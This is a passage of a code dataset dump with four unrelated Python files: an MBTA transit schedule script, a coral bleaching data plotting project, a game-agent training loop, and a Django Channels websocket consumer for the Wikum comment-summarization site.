time_reponse[k]['attributes']['arrival_time']\n\t\t\t\tprint(base_time)\n\t\t\t\tbegin_times.insert(i, base_time[base_time.index(\"T\") +1 : base_time.index(\"T\")+6])\n\t\t\telif time_reponse[k]['relationships']['stop']['data']['id'] == ending_stop:\n\t\t\t\tbase_time = time_reponse[k]['attributes']['arrival_time']\n\t\t\t\tprint(base_time)\n\t\t\t\tend_times.insert(i, base_time[base_time.index(\"T\") +1 : base_time.index(\"T\")+6])\n\n\treturn begin_times, end_times\n\n#base function to make all API requests\n#used to make the process of making API request abstract\ndef make_API_Request(url, end_tag, head, params):\n\n\trequest_url = url + \"/\" + end_tag\n\n\tbase_response = requests.get(request_url, headers = head, params = params)\n\tresponse = json.loads(base_response.text)\n\n\tif base_response.status_code == 200:\n\t\treturn response['data']\n\ndef main():\n\t#base url from which we can access the api\n\tbase_url = \"https://api-v3.mbta.com\"\n\n\tlines = create_lines_list(base_url)\n\n\tdirection_id: {\"Outbound\": 0 , \"Inbound\": 1}\n\n\n\tline_name = input(\"Please Enter a Commuter Rail Line Name: \")\n\n\tif line_name not in lines:\n\t\tprint(\"Invalid Line Name, Please run again\\n\")\n\n\tstops = create_stops_list(line_name, base_url)\n\n\tstarting_stop = input(\"Please Enter the Starting Stop:\\n\")\n\n\tending_stop = input(\"Please Enter the Ending Stop:\\n\")\n\n\tif str(starting_stop) not in stops or str(ending_stop) not in stops:\n\t\tprint(\"Invalid Stops\")\n\n\tdirection = find_travel_direction(stops, starting_stop, ending_stop)\n\n\tbegin_time = input(\"When would you like to leave (Please enter as 24 hour time in format HH:MM):\\n\")\n\n\ttrips = find_trips(base_url, direction, begin_time, line_name, starting_stop)\n\n\ttimes = find_times(base_url, trips, starting_stop, ending_stop)\n\n\tprint(\"Your Options Are:\\n\")\n\tfor i in range(len(times[0])):\n\t\tprint(f\"Get on at {starting_stop} at {times[0][i]} and get off at {ending_stop} at {times[1][i]} \")\n\t\n\n#main()\n\n","sub_path":"OnTime/mbta_api.py","file_name":"mbta_api.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"18405531","text":"\"\"\"CSC110 Fall 2020 Final Project: Global Warming and Coral Bleaching\r\n\r\nCopyright and Usage Information\r\n===============================\r\n\r\nThis file is one of the steps of project for CSC110. All forms of\r\ndistribution of this code, whether as given or with any changes, are\r\nexpressly prohibited.\r\n\r\nThis file is Copyright (c) 2020 Krystal Miao, Idris Sun, Qianning Lian, Zixiu Meng.\r\n\r\nThis is the main project for manipulating data in the dataset and visualizing our data\r\n\"\"\"\r\nimport doctest\r\nimport os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport plotly.graph_objects as go\r\nimport python_ta\r\nimport chi_square\r\nfrom ploting import get_xy_data, get_frequency_x_without_repeat, get_frequency_y_coords,\\\r\n get_dhw_y_coords, get_dhw_x_without_repeat\r\nimport model_selection\r\nimport processing_data\r\n\r\n\r\ndef plot_frequency_points(filename: str, power_x: int, power_y: int) -> None:\r\n \"\"\"Plot the frequency and average_bleaching using plotly. Display results in a web browser.\r\n \"\"\"\r\n fig = go.Figure()\r\n sim_data = get_xy_data(filename)\r\n x_coords = get_frequency_x_without_repeat(sim_data, power_x)\r\n y_coords = get_frequency_y_coords(sim_data, x_coords, power_y)\r\n\r\n fig.add_trace(go.Scatter(x=x_coords, y=y_coords, mode='markers', name='Data'))\r\n\r\n fig.show()\r\n\r\n\r\ndef plot_dhw_points(filename: str, power_x: int, power_y: int) -> None:\r\n \"\"\"Plot the given x-coordinates using plotly. Display results in a web browser\"\"\"\r\n fig = go.Figure()\r\n sim_data = get_xy_data(filename)\r\n x_coords = get_dhw_x_without_repeat(sim_data, power_x)\r\n y_coords = get_dhw_y_coords(sim_data, x_coords, power_y)\r\n\r\n fig.add_trace(go.Scatter(x=x_coords, y=y_coords, mode='markers', name='Data'))\r\n\r\n fig.show()\r\n\r\n\r\ndef linear_regression(filename: str, power_x: int, power_y: int) -> None:\r\n \"\"\"Plot the given x- and y-coordinates and linear regression and\r\n return coefficient of the linear regression\r\n \"\"\"\r\n sim_data = get_xy_data(filename)\r\n x_coords = get_frequency_x_without_repeat(sim_data, power_x)\r\n y_coords = get_frequency_y_coords(sim_data, x_coords, power_y)\r\n co = np.polyfit(x_coords, y_coords, 1)\r\n func = np.poly1d(co)\r\n plt.plot(x_coords, y_coords, 'yo', x_coords, func(x_coords), '--k')\r\n plt.xlim(0, 25)\r\n plt.ylim(0, 25)\r\n\r\n\r\nif __name__ == '__main__':\r\n file = os.getcwd() + '\\\\bcodmo_dataset_773466_712b_5843_9069.csv'\r\n header, unit, data = processing_data.load_csv_file(file)\r\n whole_data = processing_data.simplify_data(header, data)\r\n data_unit = {'average_bleaching': processing_data.get_unit(file, 'Average_Bleaching'),\r\n 'TSA_Frequency': processing_data.get_unit(file, 'TSA_Frequency'),\r\n 'TSA_DHW': processing_data.get_unit(file, 'TSA_DHW')}\r\n\r\n result_chi = chi_square.cal_chi_square(chi_square.chi_square(whole_data, 0, 0))\r\n\r\n plot_frequency_points(file, 1, 1)\r\n plot_dhw_points(file, 1, 1)\r\n\r\n best_model = model_selection.model_selection(file, [1, 2], [1, 2])\r\n\r\n linear_regression(file, best_model[0], best_model[1])\r\n\r\n doctest.testmod()\r\n\r\n python_ta.check_all(config={\r\n 'extra-imports': ['sklearn.impute', 'numpy', 'csv', 'matplotlib.pyplot', 'math',\r\n 'statistics', 'model_selection', 'ploting', 'processing_data',\r\n 'sklearn.preprocessing', 'os', 'plotly.graph_objects', 'chi_square'],\r\n 'allowed-io': ['load_csv_file'],\r\n 'max-line-length': 100,\r\n 'disable': ['R1705', 'C0200']\r\n })\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"42910063","text":"from Game2Manager import Game2Manager\nimport os.path\nimport pickle\nimport progressbar\nfrom helpers import prune\n\nmanager = None\ndata = None\ntrain = True\nsizes = 10\nprune_length = -1\ninit = 'uniform'\n\nif os.path.isfile('./instance2.p') and input(\n 'Do you want to load the previous instance? (y/n) ') == 'y':\n data = pickle.load(open('./instance2.p', 'rb'))\n if input(\n 'Do you want to train or test the model? (train/test) ') == 'test':\n train = False\n\nif train and data is None:\n if input('Init? (random or uniform) [uniform]: ') != '':\n init = 'random'\n\n lsizes = input('Init size? [10]: ')\n if lsizes != '':\n sizes = int(lsizes)\n\nif train:\n tmp = input('Prune interval [-1]: ')\n if tmp != '':\n prune_length = int(tmp)\n\n\nmanager = Game2Manager(\n prev_player=data, train=train, sizes=sizes, init_method=init)\ntrials_ = int(input('Enter number of trials: '))\ntrials = trials_\npbartmp = progressbar.ProgressBar(maxval=1).default_widgets()\npbar = progressbar.ProgressBar(\n widgets=pbartmp[:], maxval=trials)\ndel pbartmp\nwins = 0\nloss = 0\nwhile trials > 0:\n manager.simulate()\n\n if manager.check_win() == 1:\n loss += 1\n else:\n wins += 1\n manager.reset()\n\n if prune_length != -1 and trials % prune_length == 0:\n prune(manager.player)\n pbar.update(trials_ - trials)\n trials -= 1\npbar.finish()\nprint(\"Exited with\", str((wins / (wins + loss)) * 100) + \"% winrate\")\n\nif train and input(\"Do you want to dump this instance to disk? (y/n) \") == 'y':\n loc = input('Location [./instance2.p]: ')\n if loc == '':\n manager.player.dump('./instance2.p')\n else:\n manager.player.dump(loc)\n","sub_path":"train2.py","file_name":"train2.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"75843459","text":"from __future__ import print_function\nfrom __future__ import absolute_import\nfrom builtins import str\nimport re\nimport json\nimport random\nimport logging\nfrom asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer\nfrom channels.exceptions import StopConsumer\n\n# from channels import Group\n# from channels.auth import channel_session, http_session_user, channel_session_user, channel_session_user_from_http\nfrom .engine import *\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom django.utils.encoding import smart_text\nfrom website.models import Article, Source, CommentRating, CommentAuthor, Permissions\nfrom website.views import recurse_up_post, recurse_down_num_subtree, make_vector, get_summary, clean_parse, delete_node\nfrom website.engine import count_words_shown, count_article\n\nlog = logging.getLogger(__name__)\n\nclass WikumConsumer(WebsocketConsumer):\n \"\"\"\n This chat consumer handles websocket connections for chat clients.\n It uses AsyncJsonWebsocketConsumer, which means all the handling functions\n must be async functions, and any sync work (like ORM access) has to be\n behind database_sync_to_async or sync_to_async. For more, read\n http://channels.readthedocs.io/en/latest/topics/consumers.html\n \"\"\"\n ##### WebSocket event handlers\n\n def connect(self):\n \"\"\"\n Called when the websocket is handshaking as part of initial connection.\n \"\"\"\n # message['path'] = /ws/article/[article_name]/visualization_flags\n self.article_id = self.scope['url_route']['kwargs']['article_id']\n self.group_name = 'article_%s' % self.article_id\n self.user_to_locked_nodes = {}\n\n # Join room group\n async_to_sync(self.channel_layer.group_add)(\n self.group_name,\n self.channel_name\n )\n\n self.accept()\n\n def disconnect(self, close_code):\n # Release locks held by user\n username = self.scope[\"user\"].username if self.scope[\"user\"].is_authenticated else None\n print(username)\n ids = []\n if username in self.user_to_locked_nodes:\n ids = self.user_to_locked_nodes[username]\n message_ids = ids[:]\n data = {'to_lock': False, 'ids': ids, 'type': 'update_locks'}\n message = {'user': username, 'type': 'update_locks', 'ids': message_ids, 'to_lock': False}\n self.handle_update_locks(data, username)\n async_to_sync(self.channel_layer.group_send)(\n self.group_name,\n {\n 'type': 'handle.data',\n 'message': message\n }\n )\n # Leave room group\n async_to_sync(self.channel_layer.group_discard)(\n self.group_name,\n self.channel_name\n )\n raise StopConsumer\n\n def receive(self, text_data):\n try:\n article_id = self.article_id\n article = Article.objects.get(id=article_id)\n except KeyError:\n log.debug('no article in channel_session')\n return\n except Article.DoesNotExist:\n log.debug('recieved message, but article does not exist id=%s', article_id)\n return\n\n message = {}\n # Parse out a article message from the content text, bailing if it doesn't\n # conform to the expected message format.\n try:\n data = json.loads(text_data)\n user = self.scope[\"user\"]\n req_user = user if user.is_authenticated else None\n username = user.username if user.is_authenticated else None\n if user.is_anonymous:\n username = \"Anonymous\"\n if 'type' in data:\n data_type = data['type']\n if data_type == 'new_node' or data_type == 'reply_comment':\n message = self.handle_message(data, username)\n elif data_type == 'tag_one' or data_type == 'tag_selected':\n message = self.handle_tags(data, username)\n elif data_type == 'delete_tags':\n message = self.handle_delete_tags(data, username)\n elif data_type == 'update_locks':\n message = self.handle_update_locks(data, username)\n elif data_type == 'summarize_comment':\n message = self.handle_summarize_comment(data, username)\n elif data_type == 'summarize_selected':\n message = self.handle_summarize_selected(data, username)\n elif data_type == 'summarize_comments':\n message = self.handle_summarize_comments(data, username)\n elif data_type == 'hide_comment':\n message = self.handle_hide_comment(data, username)\n elif data_type == 'hide_comments':\n message = self.handle_hide_comments(data, username)\n elif data_type == 'hide_replies':\n message = self.handle_hide_replies(data, username)\n elif data_type == 'delete_comment_summary':\n message = self.handle_delete_comment_summary(data, username)\n except ValueError:\n log.debug(\"ws message isn't json text=%s\", text)\n return\n\n if data:\n async_to_sync(self.channel_layer.group_send)(\n self.group_name,\n {\n 'type': 'handle.data',\n 'message': message\n }\n )\n\n def mark_children_summarized(self, post):\n post.summarized = True\n children = Comment.objects.filter(reply_to_disqus=post.disqus_id, article=post.article)\n for child in children:\n child.summarized = True\n child.save()\n self.mark_children_summarized(child)\n\n def recurse_down_post(self, post):\n children = Comment.objects.filter(reply_to_disqus=post.disqus_id, article=post.article)\n for child in children:\n child.json_flatten = \"\"\n child.save()\n self.recurse_down_post(child)\n\n def recurse_down_hidden(self, replies, count):\n for reply in replies:\n if not reply.hidden:\n reply.hidden = True\n reply.json_flatten = ''\n reply.save()\n count += 1\n reps = Comment.objects.filter(reply_to_disqus=reply.disqus_id, article=reply.article)\n count = self.recurse_down_hidden(reps, count)\n return count\n\n def handle_data(self, event):\n message = event['message']\n self.send(text_data=json.dumps(message))\n\n\n def handle_message(self, data, username):\n article_id = self.article_id\n article = Article.objects.get(id=article_id)\n try:\n user = self.scope[\"user\"]\n owner = data.get('owner', None)\n if not owner or owner == \"None\":\n owner = None\n else:\n owner = User.objects.get(username=owner)\n\n permission = None\n if user.is_authenticated:\n permission = Permissions.objects.filter(user=user, article=article)\n if permission.exists():\n permission = permission[0]\n if article.access_mode < 2 or (user.is_authenticated and permission and (permission.access_level < 2)) or user == owner:\n comment = data['comment']\n req_user = user if user.is_authenticated else None\n req_username = user.username if user.is_authenticated else None\n # if commentauthor for username use it; otherwise create it\n author = CommentAuthor.objects.filter(username=req_username)\n if user.is_anonymous:\n req_username = \"Anonymous\"\n author = CommentAuthor.objects.create(username=req_username, anonymous=True, is_wikum=True)\n else:\n if author.exists():\n author = author[0]\n author.is_wikum = True\n author.user = user\n else:\n # existing user who is not a comment author\n author = CommentAuthor.objects.create(username=req_username, is_wikum=True, user=user)\n new_id = random_with_N_digits(10)\n new_comment = None\n explanation = ''\n if data['type'] == 'new_node':\n new_comment = Comment.objects.create(article=article,\n author=author,\n is_replacement=False,\n disqus_id=new_id,\n text=comment,\n summarized=False,\n text_len=len(comment))\n explanation = 'new comment'\n elif data['type'] == 'reply_comment':\n id = data['id']\n c = Comment.objects.get(id=id)\n new_comment = Comment.objects.create(article=article,\n author=author,\n is_replacement=False,\n reply_to_disqus=c.disqus_id,\n disqus_id=new_id,\n text=comment,\n summarized=False,\n text_len=len(comment),\n import_order=c.import_order)\n explanation = 'reply to comment'\n\n new_comment.save()\n action = data['type']\n \n recurse_up_post(new_comment)\n\n recurse_down_num_subtree(new_comment)\n\n # make_vector(new_comment, article)\n article.comment_num = article.comment_num + 1\n words_shown = count_words_shown(article)\n percent_complete = count_article(article)\n h = History.objects.create(user=req_user,\n article=article,\n action=action,\n explanation=explanation,\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n h.comments.add(new_comment)\n article.percent_complete = percent_complete\n article.words_shown = words_shown\n article.last_updated = datetime.datetime.now(tz=timezone.utc)\n\n article.save()\n response_dict = {'comment': comment, 'd_id': new_comment.id, 'author': req_username, 'type': data['type'], 'user': req_username}\n if data['type'] == 'reply_comment':\n response_dict['parent_did'] = data['id']\n return response_dict\n else:\n return {'user': username}\n except Exception as e:\n print(e)\n return {}\n\n def handle_tags(self, data, username):\n article_id = self.article_id\n article = Article.objects.get(id=article_id)\n try:\n tag = data['tag']\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n \n t, created = Tag.objects.get_or_create(article=article, text=tag.lower().strip())\n if created:\n r = lambda: random.randint(0, 255)\n color = '%02X%02X%02X' % (r(), r(), r())\n t.color = color\n t.save()\n else:\n color = t.color\n \n if data['type'] == 'tag_one':\n id = data['id']\n comment = Comment.objects.get(id=id)\n affected= False\n \n tag_exists = comment.tags.filter(text=t.text)\n if tag_exists.count() == 0:\n comment.tags.add(t)\n affected = True\n \n if affected:\n h = History.objects.create(user=req_user, \n article=article,\n action='tag_comment',\n explanation=\"Add tag %s to a comment\" % t.text,\n words_shown=article.words_shown,\n current_percent_complete=article.percent_complete)\n h.comments.add(comment)\n \n article.last_updated = datetime.datetime.now(tz=timezone.utc)\n article.save()\n \n recurse_up_post(comment)\n \n tag_count = article.comment_set.filter(tags__isnull=False).count()\n if tag_count % 2 == 0:\n from .tasks import generate_tags\n generate_tags.delay(article_id)\n\n if affected:\n response_dict = {'user': username, 'color': color, 'type': data['type'], 'd_id': data['id'], 'tag': data['tag'], 'id_str': data['id_str'], 'did_str': data['id_str']}\n return response_dict\n else:\n return {'user': username}\n elif data['type'] == 'tag_selected':\n ids = data['ids']\n comments = Comment.objects.filter(id__in=ids, hidden=False)\n \n affected_comms = [];\n \n for comment in comments:\n tag_exists = comment.tags.filter(text=t.text)\n if tag_exists.count() == 0:\n comment.tags.add(t)\n affected_comms.append(comment)\n \n if affected_comms:\n h = History.objects.create(user=req_user, \n article=article,\n action='tag_comments',\n explanation='Add tag %s to comments' % t.text,\n words_shown=article.words_shown,\n current_percent_complete=article.percent_complete)\n article.last_updated = datetime.datetime.now(tz=timezone.utc)\n article.save()\n \n for com in affected_comms:\n recurse_up_post(com)\n h.comments.add(com)\n \n tag_count = article.comment_set.filter(tags__isnull=False).count()\n if tag_count % 2 == 0:\n from .tasks import generate_tags\n generate_tags.delay(article_id)\n \n if len(affected_comms) > 0:\n response_dict = {'user': username, 'color': color, 'type': data['type'], 'dids': data['ids'], 'tag': data['tag'], 'id_str': data['id_str'], 'did_str': data['id_str']}\n return response_dict\n else:\n return {'user': username}\n except Exception as e:\n print(e)\n return {}\n\n def handle_update_locks(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n ids = data['ids']\n if username not in self.user_to_locked_nodes:\n self.user_to_locked_nodes[username] = []\n for id in ids:\n if username is not 'Anonymous':\n c = Comment.objects.get(id=id)\n if data['to_lock'] :\n self.user_to_locked_nodes[username].append(id)\n c.is_locked = True\n else:\n self.user_to_locked_nodes[username].remove(id)\n c.is_locked = False\n c.save()\n recurse_up_post(c)\n res = {'user': username, 'type': data['type'], 'ids': data['ids'], 'to_lock': data['to_lock']}\n return res\n except Exception as e:\n print(e)\n return {'user': username}\n\n\n def handle_summarize_comment(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n id = data['id']\n summary = data['comment']\n top_summary, bottom_summary = get_summary(summary)\n\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n \n c = Comment.objects.get(id=id)\n from_summary = c.summary + '\\n----------\\n' + c.extra_summary\n c.summary = top_summary\n c.extra_summary = bottom_summary\n c.save()\n \n if from_summary != '':\n action = 'edit_sum'\n explanation = 'edit summary'\n else :\n action = 'sum_comment'\n explanation = 'initial summary'\n \n recurse_up_post(c)\n words_shown = count_words_shown(a)\n percent_complete = count_article(a)\n h = History.objects.create(user=req_user, \n article=a,\n action=action,\n from_str=from_summary,\n to_str=summary,\n explanation=explanation,\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n \n h.comments.add(c)\n if from_summary == '':\n a.summary_num = a.summary_num + 1\n a.percent_complete = percent_complete\n a.words_shown = words_shown\n a.last_updated = datetime.datetime.now()\n a.save()\n res = {'user': username, 'type': data['type'], 'd_id': data['id']}\n if 'wikipedia.org' in a.url:\n if top_summary.strip() != '':\n res['top_summary'] = clean_parse(top_summary)\n else:\n res['top_summary'] = ''\n \n res['top_summary_wiki'] = top_summary\n \n if bottom_summary.strip() != '':\n res['bottom_summary'] = clean_parse(bottom_summary)\n else:\n res['bottom_summary'] = ''\n \n res['bottom_summary_wiki'] = bottom_summary\n return res\n else:\n res['top_summary'] = top_summary\n res['bottom_summary'] = bottom_summary\n return res\n \n except Exception as e:\n print(e)\n return {'user': username}\n\n def handle_summarize_selected(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n ids = data['ids']\n children_ids = data['children']\n children_ids = [int(x) for x in children_ids]\n child_id = data['child']\n \n delete_nodes = data['delete_nodes']\n \n summary = data['comment']\n \n top_summary, bottom_summary = get_summary(summary)\n \n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n \n comments = Comment.objects.filter(id__in=ids)\n children = [c for c in comments if c.id in children_ids]\n child = Comment.objects.get(id=child_id)\n \n lowest_child = children[0]\n for c in children:\n if c.import_order < lowest_child.import_order:\n lowest_child = c\n\n new_id = random_with_N_digits(10)\n \n new_comment = Comment.objects.create(article=a, \n is_replacement=True, \n reply_to_disqus=child.reply_to_disqus,\n summarized=True,\n summary=top_summary,\n extra_summary=bottom_summary,\n disqus_id=new_id,\n points=child.points,\n text_len=len(summary),\n import_order=lowest_child.import_order)\n\n\n for node in delete_nodes:\n delete_node(node)\n\n self.mark_children_summarized(new_comment)\n\n recurse_up_post(new_comment)\n\n recurse_down_num_subtree(new_comment)\n\n a.summary_num = a.summary_num + 1\n words_shown = count_words_shown(a)\n percent_complete = count_article(a)\n h = History.objects.create(user=req_user, \n article=a,\n action='sum_selected',\n to_str=summary,\n explanation='initial summary of group of comments',\n words_shown=words_shown,\n current_percent_complete=percent_complete) \n \n for c in children:\n c.reply_to_disqus = new_id\n c.save()\n h.comments.add(c)\n \n h.comments.add(new_comment)\n a.percent_complete = percent_complete\n a.words_shown = words_shown\n a.last_updated = datetime.datetime.now()\n \n a.save()\n \n res = {'user': username, 'type': data['type'], 'd_id': new_comment.id, 'lowest_d': child_id, 'children': children_ids}\n res['size'] = data['size']\n res['delete_summary_node_dids'] = data['delete_summary_node_dids']\n if 'wikipedia.org' in a.url:\n if top_summary.strip() != '':\n res['top_summary'] = clean_parse(top_summary)\n else:\n res['top_summary'] = ''\n \n res['top_summary_wiki'] = top_summary\n \n if bottom_summary.strip() != '':\n res['bottom_summary'] = clean_parse(bottom_summary)\n else:\n res['bottom_summary'] = ''\n \n res['bottom_summary_wiki'] = bottom_summary\n res['user'] = username\n res['type'] = data['type']\n return res\n else:\n res['top_summary'] = top_summary\n res['bottom_summary'] = bottom_summary\n return res\n \n except Exception as e:\n print(e)\n return {'user': username}\n\n def handle_summarize_comments(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n id = data['id']\n summary = data['comment']\n top_summary, bottom_summary = get_summary(summary)\n\n delete_nodes = data['delete_nodes']\n \n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n \n c = Comment.objects.get(id=id)\n percent_complete = a.percent_complete\n words_shown = a.words_shown\n\n if not c.is_replacement:\n new_id = random_with_N_digits(10);\n \n new_comment = Comment.objects.create(article=a, \n is_replacement=True, \n reply_to_disqus=c.reply_to_disqus,\n summary=top_summary,\n summarized=True,\n extra_summary=bottom_summary,\n disqus_id=new_id,\n points=c.points,\n text_len=len(summary),\n import_order=c.import_order)\n\n c.reply_to_disqus = new_id\n c.save()\n \n d_id = new_comment.id\n\n self.mark_children_summarized(new_comment)\n\n recurse_up_post(new_comment)\n\n recurse_down_num_subtree(new_comment)\n words_shown = count_words_shown(a)\n percent_complete = count_article(a)\n h = History.objects.create(user=req_user, \n article=a,\n action='sum_nodes',\n to_str=summary,\n explanation='initial summary of subtree',\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n h.comments.add(new_comment)\n \n else:\n from_summary = c.summary + '\\n----------\\n' + c.extra_summary\n c.summary = top_summary\n c.extra_summary=bottom_summary\n c.save()\n \n d_id = c.id\n \n new_comment = c\n recurse_down_num_subtree(new_comment)\n recurse_up_post(c)\n words_shown = count_words_shown(a)\n h = History.objects.create(user=req_user, \n article=a,\n action='edit_sum_nodes',\n from_str=from_summary,\n to_str=summary,\n explanation='edit summary of subtree',\n words_shown=words_shown,\n current_percent_complete=a.percent_complete)\n\n for node in delete_nodes:\n new_h = History.objects.create(user=req_user, \n article=a,\n action='delete_node',\n from_str=node,\n to_str=c.id,\n explanation='promote summary',\n words_shown=a.words_shown,\n current_percent_complete=a.percent_complete)\n delete_node(node)\n\n h.comments.add(c)\n if not c.is_replacement:\n a.summary_num = a.summary_num + 1\n a.percent_complete = percent_complete\n a.words_shown = words_shown\n a.last_updated = datetime.datetime.now()\n a.save()\n \n res = {'user': username, 'type': data['type'], 'd_id': new_comment.id, 'node_id': data['node_id'], 'orig_did': data['id']}\n res['subtype'] = data['subtype']\n res['delete_summary_node_dids'] = data['delete_summary_node_dids']\n if 'wikipedia.org' in a.url:\n if top_summary.strip() != '':\n res['top_summary'] = clean_parse(top_summary)\n else:\n res['top_summary'] = ''\n \n res['top_summary_wiki'] = top_summary\n \n if bottom_summary.strip() != '':\n res['bottom_summary'] = clean_parse(bottom_summary)\n else:\n res['bottom_summary'] = ''\n \n res['bottom_summary_wiki'] = bottom_summary\n return res\n else:\n res['top_summary'] = top_summary\n res['bottom_summary'] = bottom_summary\n return res\n \n except Exception as e:\n print(e)\n import traceback\n print(traceback.format_exc())\n return {'user': username}\n\n\n def handle_delete_tags(self, data, username):\n article_id = self.article_id\n article = Article.objects.get(id=article_id)\n try:\n comment_ids = data['ids']\n comment_ids = comment_ids.split(',')\n ids = []\n for idx in comment_ids:\n if idx:\n ids.append(int(idx))\n \n tag = data['tag']\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n \n comments = Comment.objects.filter(id__in=ids)\n \n affected_comments = []\n affected= False\n a = None\n \n for comment in comments:\n a = comment.article\n tag_exists = comment.tags.filter(text=tag)\n \n if tag_exists.count() == 1:\n comment.tags.remove(tag_exists[0])\n affected_comments.append(comment)\n affected = True\n if affected:\n h = History.objects.create(user=req_user, \n article=a,\n action='delete_tag',\n explanation=\"Deleted tag %s from comments\" % tag,\n words_shown=a.words_shown,\n current_percent_complete=a.percent_complete)\n for comment in affected_comments:\n h.comments.add(comment)\n \n a.last_updated = datetime.datetime.now(tz=timezone.utc)\n a.save()\n \n recurse_up_post(comment)\n \n tag_count = a.comment_set.filter(tags__isnull=False).count()\n if tag_count % 2 == 0:\n from .tasks import generate_tags\n generate_tags.delay(a.id)\n\n response_dict = {'type': data['type'], 'dids': data['ids'], 'tag': data['tag'], 'user': username}\n if affected:\n response_dict['affected'] = 1\n else:\n response_dict['affected'] = 0\n return response_dict\n except Exception as e:\n print(e)\n return {'user': username}\n\n def handle_hide_comment(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n id = data['id']\n explain = data['comment']\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n \n comment = Comment.objects.get(id=id)\n if comment.is_replacement:\n action = 'delete_sum'\n self.recurse_down_post(comment)\n delete_node(comment.id)\n a.summary_num = a.summary_num - 1\n a.percent_complete = count_article(a)\n a.words_shown = count_words_shown(a)\n a.last_updated = datetime.datetime.now()\n a.save()\n affected = False\n else:\n action = 'hide_comment'\n if not comment.hidden:\n comment.hidden = True\n comment.save()\n affected = True\n else:\n affected = False\n \n if affected:\n parent = Comment.objects.filter(disqus_id=c.reply_to_disqus, article=a)\n if parent.count() > 0:\n recurse_up_post(parent[0])\n\n a.comment_num = a.comment_num - 1\n words_shown = count_words_shown(a)\n percent_complete = count_article(a)\n h = History.objects.create(user=req_user, \n article=a,\n action=action,\n explanation=explain,\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n c = Comment.objects.get(id=id)\n h.comments.add(c)\n a.percent_complete = percent_complete\n a.words_shown = words_shown\n a.last_updated = datetime.datetime.now()\n\n a.save()\n\n return {'d_id': data['id'], 'user': username, 'type': data['type']}\n except Exception as e:\n print(e)\n return {'user': username}\n\n def handle_hide_comments(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n \n ids = data['ids']\n explain = data['comment']\n \n affected = Comment.objects.filter(id__in=ids, hidden=False).update(hidden=True)\n \n if affected > 0:\n words_shown = count_words_shown(a)\n percent_complete = count_article(a)\n h = History.objects.create(user=req_user, \n article=a,\n action='hide_comments',\n explanation=explain,\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n for id in ids:\n c = Comment.objects.get(id=id)\n h.comments.add(c)\n \n parent = Comment.objects.filter(disqus_id=c.reply_to_disqus, article=a)\n if parent.count() > 0:\n recurse_up_post(parent[0])\n \n a.comment_num = a.comment_num - affected\n a.percent_complete = percent_complete\n a.words_shown = words_shown\n a.last_updated = datetime.datetime.now()\n a.save()\n\n return {'dids': data['ids'], 'user': username, 'type': data['type']}\n except Exception as e:\n print(e)\n return {'user': username}\n\n def handle_hide_replies(self, data, username):\n try:\n article_id = self.article_id\n a = Article.objects.get(id=article_id)\n id = data['id']\n explain = data['comment']\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n \n c = Comment.objects.get(id=id)\n\n replies = Comment.objects.filter(reply_to_disqus=c.disqus_id, article=a)\n \n affected = self.recurse_down_hidden(replies, 0)\n \n if affected > 0:\n words_shown = count_words_shown(a)\n percent_complete = count_article(a)\n h = History.objects.create(user=req_user, \n article=a,\n action='hide_replies',\n explanation=explain,\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n replies = Comment.objects.filter(reply_to_disqus=c.disqus_id, article=a)\n for reply in replies:\n h.comments.add(reply)\n \n recurse_up_post(c)\n \n ids = [reply.id for reply in replies]\n \n a.comment_num = a.comment_num - affected\n a.percent_complete = percent_complete\n a.words_shown = words_shown\n a.last_updated = datetime.datetime.now()\n \n a.save()\n \n return {'d_id': data['id'], 'user': username, 'type': data['type'], 'ids': ids}\n else:\n return {'user': username}\n except Exception as e:\n print(e)\n return {'user': username}\n\n def handle_delete_comment_summary(self, data, username):\n try:\n article_id = self.article_id\n article = Article.objects.get(id=article_id)\n comment_id = data['id']\n explain = data['comment']\n req_user = self.scope[\"user\"] if self.scope[\"user\"].is_authenticated else None\n\n comment = Comment.objects.get(id=comment_id)\n if not comment.is_replacement:\n comment.summary = \"\"\n comment.save()\n recurse_up_post(comment)\n words_shown = count_words_shown(article)\n percent_complete = count_article(article)\n h = History.objects.create(user=req_user,\n article=article,\n action='delete_comment_sum',\n explanation=explain,\n words_shown=words_shown,\n current_percent_complete=percent_complete)\n\n h.comments.add(comment)\n \n article.percent_complete = percent_complete\n article.words_shown = words_shown\n article.last_updated = datetime.datetime.now()\n article.save()\n \n return {'d_id': data['id'], 'user': username, 'type': data['type']}\n\n except Exception as e:\n print(e)\n return {'user': username}\n","sub_path":"wikum/website/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":38719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} 